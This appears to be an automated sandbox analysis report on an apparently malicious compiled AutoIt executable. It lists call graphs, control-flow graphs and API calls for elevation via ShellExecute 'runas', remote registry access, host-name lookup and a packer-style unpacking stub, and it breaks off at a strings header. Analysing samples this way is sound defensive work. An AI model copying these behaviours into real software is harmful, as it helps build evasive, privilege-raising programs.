dec22e 106296->106264 106297 dec14c 106298 dec19f VariantInit VariantClear 106297->106298 106305 dec033 106297->106305 106300 dec1c5 106298->106300 106299->106297 106301 dec097 VariantInit 106299->106301 106299->106305 106302 dec1e6 106300->106302 106300->106305 106306 dec0d6 106301->106306 106331 dda6f6 103 API calls 106302->106331 106304 dec20d VariantClear 106304->106296 106332 dec235 413 API calls Mailbox 106305->106332 106306->106305 106330 dda6f6 103 API calls 106306->106330 106308->106205 106309->106232 106310->106254 106311->106266 106312->106231 106313->106195 106314->106217 106315->106217 106316->106217 106317->106257 106318->106260 106319->106288 106320->106241 106321->106237 106322->106227 106323->106243 106324->106237 106325->106237 106326->106256 106327->106244 106328->106211 106329->106237 106330->106297 106331->106304 106332->106296 106333 e01edb 106338 d9131c 106333->106338 106339 d9133e 106338->106339 106372 d91624 106339->106372 106344 d9d3d2 48 API calls 106345 d9137e 106344->106345 106346 d9d3d2 48 API calls 106345->106346 106347 d91388 106346->106347 106348 d9d3d2 48 API calls 106347->106348 106349 d91392 106348->106349 106350 d9d3d2 48 API calls 106349->106350 106351 d913d8 106350->106351 106352 d9d3d2 48 API calls 106351->106352 106353 d914bb 106352->106353 106380 d91673 106353->106380 106418 d917e0 106372->106418 106375 d97e53 48 API calls 106376 d91344 106375->106376 106377 d916db 106376->106377 106432 d91867 6 API calls 106377->106432 106379 d91374 106379->106344 106381 d9d3d2 48 API calls 106380->106381 106382 d91683 106381->106382 106383 d9d3d2 48 API calls 106382->106383 106384 d9168b 106383->106384 106433 d97d70 106384->106433 106387 d97d70 48 API calls 106388 d9169b 106387->106388 106389 d9d3d2 48 API calls 106388->106389 106390 d916a6 106389->106390 106425 d917fc 106418->106425 106421 d917fc 48 API calls 106422 d917f0 106421->106422 106423 d9d3d2 48 API calls 106422->106423 106424 d9165b 106423->106424 106424->106375 106426 d9d3d2 48 API calls 106425->106426 106427 d91807 106426->106427 106428 d9d3d2 48 API calls 106427->106428 106429 d9180f 106428->106429 106430 d9d3d2 48 API calls 106429->106430 106431 d917e8 106430->106431 106431->106421 106432->106379 106434 d9d3d2 48 API calls 106433->106434 106435 d97d79 106434->106435 106436 d9d3d2 48 API calls 106435->106436 106437 d91693 106436->106437 106437->106387 106440 db6a80 106441 db6a8c __tzset_nolock 106440->106441 106477 db8b7b GetStartupInfoW 106441->106477 106443 db6a91 106479 dba937 GetProcessHeap 106443->106479 106445 db6ae9 106446 db6af4 106445->106446 106564 db6bd0 47 API calls 3 library calls 106445->106564 106480 db87d7 106446->106480 106449 db6afa 106450 db6b05 __RTC_Initialize 106449->106450 106565 db6bd0 47 API calls 3 library calls 106449->106565 106501 dbba66 106450->106501 106453 db6b14 106454 db6b20 GetCommandLineW 106453->106454 106566 db6bd0 47 API calls 3 library calls 106453->106566 106520 dc3c2d GetEnvironmentStringsW 106454->106520 106458 db6b1f 106458->106454 106461 db6b45 106533 dc3a64 106461->106533 106464 db6b4b 106468 db6b56 106464->106468 106568 db1d7b 47 API calls 3 library calls 106464->106568 106467 db6b5e 106547 db1db5 106468->106547 106478 db8b91 106477->106478 106478->106443 106479->106445 106572 db1e5a 106480->106572 106482 db87dc 106575 db8ab3 106482->106575 106485 db87e5 106588 db884d 50 API calls 2 library calls 106485->106588 106488 db87ea 106488->106449 106490 db8802 106582 db7616 106490->106582 106493 db8844 106591 db884d 50 API calls 2 library calls 106493->106591 106496 db8823 106496->106493 106498 db8829 106496->106498 106497 db8849 106497->106449 106590 db8724 47 API calls 4 library calls 106498->106590 106500 db8831 GetCurrentThreadId 106500->106449 106502 dbba72 __tzset_nolock 106501->106502 106600 db8984 106502->106600 106504 dbba79 106505 db7616 __calloc_crt 47 API calls 106504->106505 106506 dbba8a 106505->106506 106507 dbbaf5 GetStartupInfoW 106506->106507 106509 dbba95 __tzset_nolock @_EH4_CallFilterFunc@8 106506->106509 106515 dbbc33 106507->106515 106517 dbbb0a 106507->106517 106508 dbbcf7 106607 dbbd0b RtlLeaveCriticalSection _doexit 106508->106607 106509->106453 106511 dbbc7c GetStdHandle 106511->106515 106512 db7616 __calloc_crt 47 API calls 106512->106517 106513 dbbc8e GetFileType 106513->106515 106514 dbbb58 106514->106515 106518 dbbb8a GetFileType 106514->106518 106519 dbbb98 InitializeCriticalSectionAndSpinCount 106514->106519 106515->106508 106515->106511 106515->106513 106516 dbbcbb InitializeCriticalSectionAndSpinCount 106515->106516 106516->106515 106517->106512 106517->106514 106517->106515 106518->106514 106518->106519 106519->106514 106521 dc3c3e 106520->106521 106522 db6b30 106520->106522 106646 db7660 47 API calls _W_store_winword 106521->106646 106527 dc382b GetModuleFileNameW 106522->106527 106525 dc3c64 _memmove 106526 dc3c7a FreeEnvironmentStringsW 106525->106526 106526->106522 106528 dc385f _wparse_cmdline 106527->106528 106529 db6b3a 106528->106529 106530 dc3899 106528->106530 106529->106461 106567 db1d7b 47 API calls 3 library calls 106529->106567 106647 db7660 47 API calls _W_store_winword 106530->106647 106532 dc389f _wparse_cmdline 106532->106529 106534 dc3a75 106533->106534 106536 dc3a7d __NMSG_WRITE 106533->106536 106534->106464 106535 db7616 __calloc_crt 47 API calls 106544 dc3aa6 __NMSG_WRITE 106535->106544 106536->106535 106537 dc3afd 106538 db28ca _free 47 API calls 106537->106538 106538->106534 106539 db7616 __calloc_crt 47 API calls 106539->106544 106540 dc3b22 106541 db28ca _free 47 API calls 106540->106541 106541->106534 106543 dc3b39 106649 db7ab0 IsProcessorFeaturePresent 106543->106649 106544->106534 106544->106537 106544->106539 106544->106540 106544->106543 106648 dc3317 47 API calls __cftoe_l 106544->106648 106548 db1dc1 __initterm_e __initp_misc_cfltcvt_tab __IsNonwritableInCurrentImage 106547->106548 106550 db1e00 __IsNonwritableInCurrentImage 106548->106550 106672 db1b2a 52 API calls __cinit 106548->106672 106550->106467 106564->106446 106565->106450 106566->106458 106573 db1e63 __init_pointers __initp_misc_winsig 106572->106573 106574 db8bda 30 API calls 106573->106574 106574->106482 106576 db8abf 106575->106576 106577 db8ac5 InitializeCriticalSectionAndSpinCount 106576->106577 106578 db87e1 106576->106578 106577->106576 106578->106485 106579 db8afd 106578->106579 106580 db8b14 TlsAlloc 106579->106580 106581 db87f7 106579->106581 106581->106485 106581->106490 106585 db761d 106582->106585 106584 db765a 106584->106493 106589 db8b59 TlsSetValue 106584->106589 106585->106584 106586 db763b Sleep 106585->106586 106592 dc3e5a 106585->106592 106587 db7652 106586->106587 106587->106584 106587->106585 106588->106488 106589->106496 106590->106500 106591->106497 106593 dc3e65 106592->106593 106598 dc3e80 __calloc_impl 106592->106598 106594 dc3e71 106593->106594 106593->106598 106599 db889e 47 API calls __getptd_noexit 106594->106599 106596 dc3e90 RtlAllocateHeap 106597 dc3e76 106596->106597 106596->106598 106597->106585 106598->106596 106598->106597 106599->106597 106601 db89a8 RtlEnterCriticalSection 106600->106601 106602 db8995 106600->106602 106601->106504 106608 db8a0c 106602->106608 106604 db899b 106604->106601 106632 db1d7b 47 API calls 3 library calls 106604->106632 106607->106509 106609 db8a18 __tzset_nolock 106608->106609 106610 db8a39 106609->106610 106611 db8a21 106609->106611 106613 db8aa1 __tzset_nolock 106610->106613 106624 db8a37 106610->106624 106633 db8e52 47 API calls __NMSG_WRITE 106611->106633 106613->106604 106615 db8a26 106634 db8eb2 47 API calls 5 library calls 106615->106634 106616 db8a4d 106618 db8a63 106616->106618 106619 db8a54 106616->106619 106623 db8984 __lock 46 API calls 106618->106623 106637 db889e 47 API calls __getptd_noexit 106619->106637 106620 db8a2d 106635 db1d65 GetModuleHandleExW GetProcAddress ExitProcess ___crtCorExitProcess 106620->106635 106626 db8a6a 106623->106626 106624->106610 106636 db7660 47 API calls _W_store_winword 106624->106636 106625 db8a59 106625->106613 106627 db8a79 InitializeCriticalSectionAndSpinCount 106626->106627 106628 db8a8e 106626->106628 106629 db8a94 106627->106629 106638 db28ca 106628->106638 106644 db8aaa RtlLeaveCriticalSection _doexit 106629->106644 106633->106615 106634->106620 106636->106616 106637->106625 106639 db28d3 RtlFreeHeap 106638->106639 106643 db28fc _free 106638->106643 106640 db28e8 106639->106640 106639->106643 106645 db889e 47 API calls __getptd_noexit 106640->106645 106642 db28ee GetLastError 106642->106643 106643->106629 106644->106613 106645->106642 106646->106525 106647->106532 106648->106544 106650 db7abb 106649->106650 106655 db7945 106650->106655 106672->106550 107455 e0c05b 107456 e0c05d 107455->107456 107459 dd78ee WSAStartup 107456->107459 107458 e0c066 107460 dd7917 gethostname gethostbyname 107459->107460 107461 dd79b1 _wcscpy 107459->107461 107460->107461 107462 dd793a _memmove 107460->107462 107461->107458 107463 dd7970 inet_ntoa 107462->107463 107467 dd7952 _wcscpy 107462->107467 107465 dd7989 _strcat 107463->107465 107464 dd79a9 WSACleanup 107464->107461 107468 dd8553 107465->107468 107467->107464 107469 dd8565 _strlen 107468->107469 107470 dd8561 107468->107470 107471 dd8574 MultiByteToWideChar 107469->107471 107470->107467 107471->107470 107472 dd858a 107471->107472 107473 db010a 48 API calls 107472->107473 107474 dd85a6 MultiByteToWideChar 107473->107474 107474->107470 107475 d929c2 107476 d929cb 107475->107476 107477 d929e9 107476->107477 107478 d92a48 107476->107478 107519 d92a46 107476->107519 107482 d92aac PostQuitMessage 107477->107482 107483 d929f6 107477->107483 107480 e02307 107478->107480 107481 d92a4e 107478->107481 107479 d92a2b NtdllDefWindowProc_W 107489 d92a39 107479->107489 107530 d9322e 16 API calls 107480->107530 107484 d92a53 107481->107484 107485 d92a76 SetTimer RegisterClipboardFormatW 107481->107485 107482->107489 107487 d92a01 107483->107487 107488 e0238f 107483->107488 107490 d92a5a KillTimer 107484->107490 107491 e022aa 107484->107491 107485->107489 107493 d92a9f CreatePopupMenu 107485->107493 107494 d92a09 107487->107494 107495 d92ab6 107487->107495 107536 dd57fb 60 API calls _memset 107488->107536 107527 d92b94 Shell_NotifyIconW _memset 107490->107527 107497 e022e3 MoveWindow 107491->107497 107498 e022af 107491->107498 107492 e0232e 107531 daec33 413 API calls Mailbox 107492->107531 107493->107489 107501 e02374 107494->107501 107502 d92a14 107494->107502 107520 d91e58 107495->107520 107497->107489 107505 e022d2 SetFocus 107498->107505 107506 e022b3 107498->107506 107501->107479 107535 dcb31f 48 API calls 107501->107535 107508 d92a1f 107502->107508 107509 e0235f 107502->107509 107503 e023a1 107503->107479 107503->107489 107505->107489 107506->107508 107510 e022bc 107506->107510 107507 d92a6d 107528 d92ac7 DeleteObject DestroyWindow Mailbox 107507->107528 107508->107479 107532 d92b94 Shell_NotifyIconW _memset 107508->107532 107534 dd5fdb 70 API calls _memset 107509->107534 107529 d9322e 16 API calls 107510->107529 107515 e0236f 107515->107489 107517 e02353 107533 d93598 67 API calls _memset 107517->107533 107519->107479 107521 d91e6f _memset 107520->107521 107522 d91ef1 107520->107522 107537 d938e4 107521->107537 107522->107489 107524 d91eda KillTimer SetTimer 107524->107522 107525 d91e96 107525->107524 107526 e04518 Shell_NotifyIconW 107525->107526 107526->107524 107527->107507 107528->107489 107529->107489 107530->107492 107531->107508 107532->107517 107533->107519 107534->107515 107535->107519 107536->107503 107538 d93900 107537->107538 107558 d939d5 Mailbox 107537->107558 107539 d97b6e 48 API calls 107538->107539 107540 d9390e 107539->107540 107541 d9391b 107540->107541 107542 e0453f LoadStringW 107540->107542 107543 d97e53 48 API calls 107541->107543 107545 e04559 107542->107545 107544 d93930 107543->107544 107544->107545 107546 d93941 107544->107546 107560 d939e8 48 API calls 2 library calls 107545->107560 107548 d9394b 107546->107548 107549 d939da 107546->107549 107559 d939e8 48 API calls 2 library calls 107548->107559 107551 d9c935 48 API calls 107549->107551 107550 e04564 107553 e04578 107550->107553 107556 d93956 _memset _wcscpy 107550->107556 107551->107556 107561 d939e8 48 API calls 2 library calls 107553->107561 107555 e04586 107557 d939ba Shell_NotifyIconW 107556->107557 107557->107558 107558->107525 107559->107556 107560->107550 107561->107555 107562 e04ddc 107563 e04de6 VariantClear 107562->107563 107564 da4472 107562->107564 107563->107564 107565 ef30b0 107566 ef30c0 107565->107566 107567 ef31da LoadLibraryA 107566->107567 107571 ef321f VirtualProtect VirtualProtect 107566->107571 107568 ef31f1 107567->107568 107568->107566 107570 ef3203 GetProcAddress 107568->107570 107570->107568 107573 ef3219 ExitProcess 107570->107573 107572 ef3284 107571->107572 107572->107572

                                                                                                                        Control-flow Graph

                                                                                                                        APIs
                                                                                                                        • GetCurrentDirectoryW.KERNEL32(00000104,?,00000000,00000001), ref: 00D9376D
                                                                                                                          • Part of subcall function 00D94257: GetModuleFileNameW.KERNEL32(00000000,C:\Users\user\Desktop\._cache_FGNEBI.exe,00000104,?,00000000,00000001,00000000), ref: 00D9428C
                                                                                                                        • IsDebuggerPresent.KERNEL32(?,?), ref: 00D9377F
                                                                                                                        • GetFullPathNameW.KERNEL32(C:\Users\user\Desktop\._cache_FGNEBI.exe,00000104,?,00E51120,C:\Users\user\Desktop\._cache_FGNEBI.exe,00E51124,?,?), ref: 00D937EE
                                                                                                                          • Part of subcall function 00D934F3: GetFullPathNameW.KERNEL32(?,00000104,?,?), ref: 00D9352A
                                                                                                                        • SetCurrentDirectoryW.KERNEL32(?), ref: 00D93860
                                                                                                                        • MessageBoxA.USER32(00000000,This is a compiled AutoIt script. AV researchers please email avsupport@autoitscript.com for support.,00E42934,00000010), ref: 00E021C5
                                                                                                                        • SetCurrentDirectoryW.KERNEL32(?,?), ref: 00E021FD
                                                                                                                        • GetModuleFileNameW.KERNEL32(00000000,?,00000104,?), ref: 00E02232
                                                                                                                        • GetForegroundWindow.USER32(runas,?,?,?,00000001,?,00E2DAA4), ref: 00E02290
                                                                                                                        • ShellExecuteW.SHELL32(00000000), ref: 00E02297
                                                                                                                          • Part of subcall function 00D930A5: GetSysColorBrush.USER32(0000000F), ref: 00D930B0
                                                                                                                          • Part of subcall function 00D930A5: LoadCursorW.USER32(00000000,00007F00), ref: 00D930BF
                                                                                                                          • Part of subcall function 00D930A5: LoadIconW.USER32(00000063), ref: 00D930D5
                                                                                                                          • Part of subcall function 00D930A5: LoadIconW.USER32(000000A4), ref: 00D930E7
                                                                                                                          • Part of subcall function 00D930A5: LoadIconW.USER32(000000A2), ref: 00D930F9
                                                                                                                          • Part of subcall function 00D930A5: RegisterClassExW.USER32(?), ref: 00D93167
                                                                                                                          • Part of subcall function 00D92E9D: CreateWindowExW.USER32(00000000,AutoIt v3,AutoIt v3,00CF0000,80000000,80000000,0000012C,00000064,00000000,00000000,00000000,00000001), ref: 00D92ECB
                                                                                                                          • Part of subcall function 00D92E9D: CreateWindowExW.USER32(00000000,edit,00000000,50B008C4,00000000,00000000,00000000,00000000,00000000,00000001,00000000), ref: 00D92EEC
                                                                                                                          • Part of subcall function 00D92E9D: ShowWindow.USER32(00000000), ref: 00D92F00
                                                                                                                          • Part of subcall function 00D92E9D: ShowWindow.USER32(00000000), ref: 00D92F09
                                                                                                                          • Part of subcall function 00D93598: _memset.LIBCMT ref: 00D935BE
                                                                                                                          • Part of subcall function 00D93598: Shell_NotifyIconW.SHELL32(00000000,?), ref: 00D93667
                                                                                                                        Strings
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 00000002.00000002.2657710003.0000000000D91000.00000040.00000001.01000000.00000005.sdmp, Offset: 00D90000, based on PE: true
                                                                                                                        • Associated: 00000002.00000002.2657630213.0000000000D90000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                        • Associated: 00000002.00000002.2657710003.0000000000E3E000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                        • Associated: 00000002.00000002.2657710003.0000000000E4A000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                        • Associated: 00000002.00000002.2657710003.0000000000E64000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                        • Associated: 00000002.00000002.2657710003.0000000000EED000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                        • Associated: 00000002.00000002.2658987924.0000000000EF3000.00000080.00000001.01000000.00000005.sdmpDownload File
                                                                                                                        • Associated: 00000002.00000002.2659256194.0000000000EF4000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                        • Snapshot File: hcaresult_2_2_d90000_UNK_.jbxd
                                                                                                                        Similarity
                                                                                                                        • API ID: Window$IconLoadName$CurrentDirectory$CreateFileFullModulePathShow$BrushClassColorCursorDebuggerExecuteForegroundMessageNotifyPresentRegisterShellShell__memset
                                                                                                                        • String ID: C:\Users\user\Desktop\._cache_FGNEBI.exe$This is a compiled AutoIt script. AV researchers please email avsupport@autoitscript.com for support.$runas$"
                                                                                                                        • API String ID: 4253510256-1103283160
                                                                                                                        • Opcode ID: 05398e367ab25913fcb32bfb076df648be072a25f5c70ca43f70c02319fdfb71
                                                                                                                        • Instruction ID: fff449003058d66a14de97e72a66e23531c4ba809cfa88ee77cf16f6749ef630
                                                                                                                        • Opcode Fuzzy Hash: 05398e367ab25913fcb32bfb076df648be072a25f5c70ca43f70c02319fdfb71
                                                                                                                        • Instruction Fuzzy Hash: 6951F374648344BECF10ABA2EC46FFD7B68DB45715F04589AFB51B21E1CA608A49CB32

                                                                                                                        Control-flow Graph

                                                                                                                        • Executed
                                                                                                                        • Not Executed
                                                                                                                        control_flow_graph 1168 df30ad-df315b call d9ca8e call d9d3d2 * 3 call d984a6 call df3d7b call df3af7 1183 df315d-df3161 1168->1183 1184 df3166-df3170 1168->1184 1185 df31e6-df31f2 call ddd7e4 1183->1185 1186 df31a2 1184->1186 1187 df3172-df3187 RegConnectRegistryW 1184->1187 1196 df3504-df3527 call d95cd3 * 3 1185->1196 1191 df31a6-df31c3 RegOpenKeyExW 1186->1191 1189 df319c-df31a0 1187->1189 1190 df3189-df319a call d97ba9 1187->1190 1189->1191 1190->1185 1194 df31f7-df3227 call d984a6 RegQueryValueExW 1191->1194 1195 df31c5-df31d7 call d97ba9 1191->1195 1203 df323e-df3254 call d97ba9 1194->1203 1204 df3229-df3239 call d97ba9 1194->1204 1206 df31d9-df31dd RegCloseKey 1195->1206 1207 df31e3-df31e4 1195->1207 1215 df34dc-df34dd 1203->1215 1216 df325a-df325f 1203->1216 1214 df34df-df34e6 call ddd7e4 1204->1214 1206->1207 1207->1185 1223 df34eb-df34fc RegCloseKey 1214->1223 1215->1214 1220 df344c-df3498 call db010a call d984a6 RegQueryValueExW 1216->1220 1221 df3265-df3268 1216->1221 1244 df349a-df34a6 1220->1244 1245 df34b4-df34ce call d97ba9 call ddd7e4 1220->1245 1224 df326e-df3273 1221->1224 1225 df33d9-df3411 call ddad14 call d984a6 RegQueryValueExW 1221->1225 1223->1196 1227 df34fe-df3502 RegCloseKey 1223->1227 1229 df338d-df33d4 call d984a6 RegQueryValueExW call da2570 1224->1229 1230 df3279-df327c 1224->1230 1225->1223 1251 df3417-df3447 call d97ba9 call ddd7e4 call da2570 1225->1251 1227->1196 1229->1223 1231 df32de-df332b call db010a call d984a6 RegQueryValueExW 1230->1231 1232 df327e-df3281 1230->1232 1231->1245 1261 df3331-df3348 1231->1261 1232->1215 1236 df3287-df32d9 call d984a6 RegQueryValueExW call da2570 1232->1236 1236->1223 1250 df34aa-df34b2 call d9ca8e 1244->1250 1264 df34d3-df34da call db017e 1245->1264 1250->1264 1251->1223 1261->1250 1265 df334e-df3355 1261->1265 1264->1223 1268 df335c-df3361 1265->1268 1269 df3357-df3358 1265->1269 1272 df3376-df337b 1268->1272 1273 df3363-df3367 1268->1273 1269->1268 1272->1250 1276 df3381-df3388 1272->1276 1274 df3369-df336d 1273->1274 1275 df3371-df3374 1273->1275 1274->1275 1275->1272 1275->1273 1276->1250
                                                                                                                        APIs
                                                                                                                          • Part of subcall function 00DF3AF7: CharUpperBuffW.USER32(?,?,?,?,?,?,?,00DF2AA6,?,?), ref: 00DF3B0E
                                                                                                                        • RegConnectRegistryW.ADVAPI32(?,?,?), ref: 00DF317F
                                                                                                                          • Part of subcall function 00D984A6: __swprintf.LIBCMT ref: 00D984E5
                                                                                                                          • Part of subcall function 00D984A6: __itow.LIBCMT ref: 00D98519
                                                                                                                        • RegQueryValueExW.KERNEL32(?,?,00000000,?,00000000,?), ref: 00DF321E
                                                                                                                        • RegQueryValueExW.ADVAPI32(?,?,00000000,00000000,?,00000008), ref: 00DF32B6
                                                                                                                        • RegCloseKey.ADVAPI32(000000FE,000000FE,00000000,?,00000000), ref: 00DF34F5
                                                                                                                        • RegCloseKey.ADVAPI32(00000000), ref: 00DF3502
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 00000002.00000002.2657710003.0000000000D91000.00000040.00000001.01000000.00000005.sdmp, Offset: 00D90000, based on PE: true
                                                                                                                        • Associated: 00000002.00000002.2657630213.0000000000D90000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                        • Associated: 00000002.00000002.2657710003.0000000000E3E000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                        • Associated: 00000002.00000002.2657710003.0000000000E4A000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                        • Associated: 00000002.00000002.2657710003.0000000000E64000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                        • Associated: 00000002.00000002.2657710003.0000000000EED000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                        • Associated: 00000002.00000002.2658987924.0000000000EF3000.00000080.00000001.01000000.00000005.sdmpDownload File
                                                                                                                        • Associated: 00000002.00000002.2659256194.0000000000EF4000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                        • Snapshot File: hcaresult_2_2_d90000_UNK_.jbxd
                                                                                                                        Similarity
                                                                                                                        • API ID: CloseQueryValue$BuffCharConnectRegistryUpper__itow__swprintf
                                                                                                                        • String ID:
                                                                                                                        • API String ID: 1240663315-0
                                                                                                                        • Opcode ID: 30841ed8972f8f160399e57436e1e08a1f3a164c9ea04da855f4f64aa286d9ad
                                                                                                                        • Instruction ID: 9796f385dc254f5dd4b291d06cf37fa851fb9d251ad6ff5b83ed1a9dea4eb413
                                                                                                                        • Opcode Fuzzy Hash: 30841ed8972f8f160399e57436e1e08a1f3a164c9ea04da855f4f64aa286d9ad
                                                                                                                        • Instruction Fuzzy Hash: E7E17C71204204AFCB14DF29C891D2ABBE9EF89714F05C96DF54ADB261DB31EE05CB62

                                                                                                                        Control-flow Graph

                                                                                                                        • Executed
                                                                                                                        • Not Executed
                                                                                                                        control_flow_graph 1278 d929c2-d929e2 1280 d92a42-d92a44 1278->1280 1281 d929e4-d929e7 1278->1281 1280->1281 1282 d92a46 1280->1282 1283 d929e9-d929f0 1281->1283 1284 d92a48 1281->1284 1285 d92a2b-d92a33 NtdllDefWindowProc_W 1282->1285 1288 d92aac-d92ab4 PostQuitMessage 1283->1288 1289 d929f6-d929fb 1283->1289 1286 e02307-e02335 call d9322e call daec33 1284->1286 1287 d92a4e-d92a51 1284->1287 1296 d92a39-d92a3f 1285->1296 1325 e0233a-e02341 1286->1325 1290 d92a53-d92a54 1287->1290 1291 d92a76-d92a9d SetTimer RegisterClipboardFormatW 1287->1291 1295 d92a72-d92a74 1288->1295 1293 d92a01-d92a03 1289->1293 1294 e0238f-e023a3 call dd57fb 1289->1294 1297 d92a5a-d92a6d KillTimer call d92b94 call d92ac7 1290->1297 1298 e022aa-e022ad 1290->1298 1291->1295 1300 d92a9f-d92aaa CreatePopupMenu 1291->1300 1301 d92a09-d92a0e 1293->1301 1302 d92ab6-d92ac0 call d91e58 1293->1302 1294->1295 1319 e023a9 1294->1319 1295->1296 1297->1295 1304 e022e3-e02302 MoveWindow 1298->1304 1305 e022af-e022b1 1298->1305 1300->1295 1308 e02374-e0237b 1301->1308 1309 d92a14-d92a19 1301->1309 1320 d92ac5 1302->1320 1304->1295 1312 e022d2-e022de SetFocus 1305->1312 1313 e022b3-e022b6 1305->1313 1308->1285 1315 e02381-e0238a call dcb31f 1308->1315 1317 d92a1f-d92a25 1309->1317 1318 e0235f-e0236f call dd5fdb 1309->1318 1312->1295 1313->1317 1321 e022bc-e022cd call d9322e 1313->1321 1315->1285 1317->1285 1317->1325 1318->1295 1319->1285 1320->1295 1321->1295 1325->1285 1329 e02347-e0235a call d92b94 call d93598 1325->1329 1329->1285
                                                                                                                        APIs
                                                                                                                        • NtdllDefWindowProc_W.NTDLL(?,?,?,?), ref: 00D92A33
                                                                                                                        • KillTimer.USER32(?,00000001), ref: 00D92A5D
                                                                                                                        • SetTimer.USER32(?,00000001,000002EE,00000000), ref: 00D92A80
                                                                                                                        • RegisterClipboardFormatW.USER32(TaskbarCreated), ref: 00D92A8B
                                                                                                                        • CreatePopupMenu.USER32 ref: 00D92A9F
                                                                                                                        • PostQuitMessage.USER32(00000000), ref: 00D92AAE
                                                                                                                        Strings
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 00000002.00000002.2657710003.0000000000D91000.00000040.00000001.01000000.00000005.sdmp, Offset: 00D90000, based on PE: true
                                                                                                                        • Associated: 00000002.00000002.2657630213.0000000000D90000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                        • Associated: 00000002.00000002.2657710003.0000000000E3E000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                        • Associated: 00000002.00000002.2657710003.0000000000E4A000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                        • Associated: 00000002.00000002.2657710003.0000000000E64000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                        • Associated: 00000002.00000002.2657710003.0000000000EED000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                        • Associated: 00000002.00000002.2658987924.0000000000EF3000.00000080.00000001.01000000.00000005.sdmpDownload File
                                                                                                                        • Associated: 00000002.00000002.2659256194.0000000000EF4000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                        • Snapshot File: hcaresult_2_2_d90000_UNK_.jbxd
                                                                                                                        Similarity
                                                                                                                        • API ID: Timer$ClipboardCreateFormatKillMenuMessageNtdllPopupPostProc_QuitRegisterWindow
                                                                                                                        • String ID: TaskbarCreated
                                                                                                                        • API String ID: 157504867-2362178303
                                                                                                                        • Opcode ID: 5c8cb2d8703df1f379f87e60a1f90a383d472221cc11ef4af4e58ed7647f01bd
                                                                                                                        • Instruction ID: 0ba986c1b66726534f9cc27da2c0f2cd02319017e6b46b82595f985ea32f68a9
                                                                                                                        • Opcode Fuzzy Hash: 5c8cb2d8703df1f379f87e60a1f90a383d472221cc11ef4af4e58ed7647f01bd
                                                                                                                        • Instruction Fuzzy Hash: 15411532244246BFDF38AF65EC0ABB93799E714305F044959FA42B61E1DA74DC888771
                                                                                                                        APIs
                                                                                                                        • GetVersionExW.KERNEL32(?), ref: 00DAE4A7
                                                                                                                          • Part of subcall function 00D97E53: _memmove.LIBCMT ref: 00D97EB9
                                                                                                                        • GetCurrentProcess.KERNEL32(00000000,00E2DC28,?,?), ref: 00DAE567
                                                                                                                        • GetNativeSystemInfo.KERNEL32(?,00E2DC28,?,?), ref: 00DAE5BC
                                                                                                                        • FreeLibrary.KERNEL32(00000000,?,?), ref: 00DAE5C7
                                                                                                                        • FreeLibrary.KERNEL32(00000000,?,?), ref: 00DAE5DA
                                                                                                                        • GetSystemInfo.KERNEL32(?,00E2DC28,?,?), ref: 00DAE5E4
                                                                                                                        • GetSystemInfo.KERNEL32(?,00E2DC28,?,?), ref: 00DAE5F0
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 00000002.00000002.2657710003.0000000000D91000.00000040.00000001.01000000.00000005.sdmp, Offset: 00D90000, based on PE: true
                                                                                                                        • Associated: 00000002.00000002.2657630213.0000000000D90000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                        • Associated: 00000002.00000002.2657710003.0000000000E3E000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                        • Associated: 00000002.00000002.2657710003.0000000000E4A000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                        • Associated: 00000002.00000002.2657710003.0000000000E64000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                        • Associated: 00000002.00000002.2657710003.0000000000EED000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                        • Associated: 00000002.00000002.2658987924.0000000000EF3000.00000080.00000001.01000000.00000005.sdmpDownload File
                                                                                                                        • Associated: 00000002.00000002.2659256194.0000000000EF4000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                        • Snapshot File: hcaresult_2_2_d90000_UNK_.jbxd
                                                                                                                        Similarity
                                                                                                                        • API ID: InfoSystem$FreeLibrary$CurrentNativeProcessVersion_memmove
                                                                                                                        • String ID:
                                                                                                                        • API String ID: 2717633055-0
                                                                                                                        • Opcode ID: 840963a2911bd50d0d774883d1a64365fa23f71149c347048835e1e2d971765c
                                                                                                                        • Instruction ID: 2971fe5facd776f625cbc7e389d4d4007506f42ce25f7949110e137addce6021
                                                                                                                        • Opcode Fuzzy Hash: 840963a2911bd50d0d774883d1a64365fa23f71149c347048835e1e2d971765c
                                                                                                                        • Instruction Fuzzy Hash: EE61E1B180A384CFCF15CF68A8C01E97FB5AF6A308F1849D8D884AB247D624C948CF75
                                                                                                                        APIs
                                                                                                                        • CreateStreamOnHGlobal.COMBASE(00000000,00000001,?), ref: 00D93202
                                                                                                                        • FindResourceExW.KERNEL32(?,0000000A,SCRIPT,00000000), ref: 00D93219
                                                                                                                        • LoadResource.KERNEL32(?,00000000), ref: 00E057D7
                                                                                                                        • SizeofResource.KERNEL32(?,00000000), ref: 00E057EC
                                                                                                                        • LockResource.KERNEL32(?), ref: 00E057FF
                                                                                                                        Strings
